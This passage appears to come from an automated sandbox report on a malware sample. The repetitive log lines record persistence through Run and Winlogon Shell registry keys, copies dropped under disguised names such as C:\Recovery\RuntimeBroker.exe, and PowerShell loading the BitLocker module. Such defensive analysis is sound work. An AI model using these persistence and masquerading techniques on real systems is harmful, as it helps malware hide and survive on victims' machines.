                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                      Creates autostart registry keys with suspicious values (likely registry only malware)
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjb "C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe"Jump to behavior
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MaEiPrsQRasQLtRzJjbJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
